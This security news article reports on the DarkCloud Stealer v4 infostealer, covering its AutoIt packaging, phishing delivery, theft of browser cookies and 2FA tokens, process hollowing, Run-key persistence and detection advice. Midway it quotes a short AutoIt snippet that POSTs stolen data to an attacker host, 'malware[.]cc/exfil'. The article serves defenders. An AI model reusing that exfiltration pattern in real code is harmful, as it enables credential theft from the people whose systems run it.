A new variant of the DarkCloud information-stealing malware has emerged, leveraging the AutoIt scripting language to bypass security tools and harvest sensitive credentials from infected systems.

Dubbed DarkCloud Stealer v4, the malware has targeted financial institutions, healthcare organizations, and e-commerce platforms across Asia and Europe since its initial detection in March 2025.

Security experts warn that its novel use of legacy tools and obfuscation techniques poses significant challenges for traditional detection methods.

According to researchers at Palo Alto Networks’ Unit 42 threat intelligence team, DarkCloud v4 exploits AutoIt’s flexible scripting capabilities to compile malicious payloads into standalone executables.

These executables mimic legitimate software processes, enabling the malware to evade heuristic analysis and sandboxing.

Attack vectors include phishing campaigns disguised as invoice alerts, malicious advertising redirects, and fake software updates for popular productivity tools like Slack and Zoom.

Once executed, the stealer extracts browser cookies, autofill data, and two-factor authentication (2FA) tokens, which are exfiltrated to attacker-controlled servers via encrypted HTTPS channels.

Researchers at Palo Alto Networks identified that the malware’s impact has been severe: breaches linked to DarkCloud v4 have already compromised over 120,000 corporate and individual accounts, with stolen credentials sold on darknet markets.

Its modular design allows operators to dynamically update payloads, ensuring adaptability to new security measures.

AutoIt Scripting and Process Hollowing

DarkCloud v4’s core innovation lies in its use of AutoIt, a scripting language typically associated with administrative automation.

By compiling malicious scripts into lightweight executables, attackers evade signature-based detection.

For example, the malware embeds its payload within an AutoIt interpreter, which executes the script directly in memory:-

#include   
$hSession = _WinHttpOpen()  
$hConnect = _WinHttpConnect($hSession, "malware[.]cc")  
$hRequest = _WinHttpSendRequest($hConnect, "POST", "/exfil",..., $sData)  

This script snippet demonstrates DarkCloud’s HTTP POST request to exfiltrate stolen data.

Palo Alto Networks analysts noted that the malware further obfuscates strings using Base64 and XOR encryption, while inserting “junk code” to confuse static analysis tools.

To persist undetected, DarkCloud employs process hollowing, injecting its code into legitimate processes like explorer.exe or svchost.exe.

The malware suspends the target process, replaces its memory with malicious code, and resumes execution-a technique captured in forensic memory dumps.

Additionally, it creates scheduled tasks and Registry entries (HKCU\Software\Microsoft\Windows\CurrentVersion\Run) to maintain persistence after system reboots.

Organizations are advised to monitor for unusual AutoIt-related processes, particularly those spawning network connections to unrecognized domains.

Endpoint detection tools should prioritize behavioral analysis, such as unexpected process injections or rapid credential-access attempts.

Palo Alto Networks recommends enforcing application allowlisting and segmenting networks to limit lateral movement.

Security teams can hunt for compiled AutoIt executables (.a3x) or anomalous script-child processes originating from trusted applications.

For now, vigilance against socially engineered triggers remains critical to disrupting this stealthy threat.

How SOC Teams Save Time and Effort with ANY.RUN - Live webinar for SOC teams and managers